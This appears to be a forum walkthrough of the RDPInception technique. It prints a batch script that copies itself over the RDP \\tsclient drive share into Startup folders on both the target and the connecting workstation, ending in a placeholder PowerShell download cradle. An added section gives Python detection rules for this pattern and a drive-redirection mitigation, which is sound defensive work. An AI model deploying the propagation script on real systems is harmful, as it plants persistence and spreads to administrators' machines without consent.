How RDPInception Works

sujitht:
Remote Desktop is often used by systems administrators to manage machines remotely. In many organisations this means a machine is placed in a DMZ or otherwise segregated part of the network, and that segment needs no inbound TCP access other than port 3389.

The proof of concept for RDPInception is a relatively simple batch script, the details of which we will walk through below:

Switches off echo.

--- Code: ---@echo off
--- End code ---
Waits briefly to ensure that the tsclient share (the redirected drive of the connecting machine) is mounted.

--- Code: ---timeout 1 >nul 2>&1
--- End code ---
Makes a temp directory on both the visiting machine and the target.

--- Code: ---mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
--- End code ---
Copies this script (run.bat) into both directories.

--- Code: ---copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
--- End code ---
Ensures the working text file does not already exist in %TEMP%.

--- Code: ---del /q %TEMP%\temp_00.txt >nul 2>&1
--- End code ---
Scans for startup directories on both the visiting machine and the target.

--- Code: ---set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
--- End code ---
Runs through each path and attempts to propagate the file to it.

--- Code: ---for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (
copy run.bat "%%a" >nul 2>&1
copy C:\temp\run.bat "%%a" >nul 2>&1
copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1
)
--- End code ---
Cleans up the %TEMP% file.

--- Code: ---del /q %TEMP%\temp_00.txt >nul 2>&1
--- End code ---
Executes the PowerShell download cradle.

--- Code: ---powershell.exe <cradle here>
--- End code ---
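The steps above boil down to two observable file operations: the script writes itself into Startup folders, and it does so through the \\tsclient\ share that RDP drive redirection exposes, which is how it crosses from the target back to the connecting workstation. The following detection logic is an added example, not part of the original post or of the RDPInception proof of concept. It runs over a few constructed, Sysmon-style FileCreate (Event ID 11) records flattened to key=value pairs (the flattening format is an assumption; the field names match Sysmon) and flags writes that fit the pattern, giving the strongest verdict to a write that lands in a Startup folder over the redirected drive.

```python
"""Added example (not from the original post): flag file writes that match the
RDPInception propagation pattern. Input is constructed, Sysmon-style FileCreate
data, not real telemetry."""
import re

# Path fragments the walkthrough touches: the Startup folder the script copies
# itself into, and the tsclient share that reaches the connecting workstation
# through RDP drive redirection.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
TSCLIENT_RE = re.compile(r"^\\\\tsclient\\", re.IGNORECASE)

# Constructed sample records (assumption: a log pipeline has flattened Sysmon
# events into "key=value|key=value" lines). Field names follow Sysmon.
SAMPLE_EVENTS = [
    "EventID=11|Image=C:\\Windows\\System32\\cmd.exe"
    "|TargetFilename=C:\\temp\\run.bat",
    "EventID=11|Image=C:\\Windows\\System32\\cmd.exe"
    "|TargetFilename=\\\\tsclient\\c\\temp\\run.bat",
    "EventID=11|Image=C:\\Windows\\System32\\cmd.exe"
    "|TargetFilename=C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows"
    "\\Start Menu\\Programs\\Startup\\run.bat",
    "EventID=11|Image=C:\\Windows\\System32\\cmd.exe"
    "|TargetFilename=\\\\tsclient\\c\\Users\\admin\\AppData\\Roaming\\Microsoft"
    "\\Windows\\Start Menu\\Programs\\Startup\\run.bat",
    "EventID=11|Image=C:\\Program Files\\Editor\\editor.exe"
    "|TargetFilename=C:\\Users\\admin\\Documents\\notes.txt",
    "EventID=1|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c run.bat",
]


def parse_event(line):
    """Turn one flattened record into a dict of its fields."""
    return dict(field.split("=", 1) for field in line.split("|"))


def classify(event):
    """Return the reasons a FileCreate event looks like RDPInception activity.

    An empty list means the event is not interesting for this detection.
    """
    reasons = []
    if event.get("EventID") != "11":  # only FileCreate events carry a target path
        return reasons
    target = event.get("TargetFilename", "")
    over_rdp = bool(TSCLIENT_RE.search(target))
    into_startup = bool(STARTUP_RE.search(target))
    if over_rdp:
        reasons.append("write over RDP drive redirection (tsclient)")
    if into_startup:
        reasons.append("write into a Startup folder")
    if over_rdp and into_startup:
        # This is the step that plants persistence on the connecting machine,
        # i.e. the one that crosses the network boundary.
        reasons.append("persistence planted on the connecting workstation")
    return reasons


def find_suspicious(lines):
    """Return (target path, reasons) for every record that triggers a rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            hits.append((event["TargetFilename"], reasons))
    return hits


if __name__ == "__main__":
    for path, reasons in find_suspicious(SAMPLE_EVENTS):
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Note what the rules do not flag: the staging copy to C:\temp\run.bat looks like any other batch file being written and produces no hit on its own, so the Startup folder and the \\tsclient\ prefix are the signals worth alerting on. On the mitigation side, the whole technique depends on drive redirection being allowed on the session host; the "Do not allow drive redirection" policy under Remote Desktop Session Host, Device and Resource Redirection (stored as the fDisableCdm value under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services) removes the \\tsclient\ share that the script relies on.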
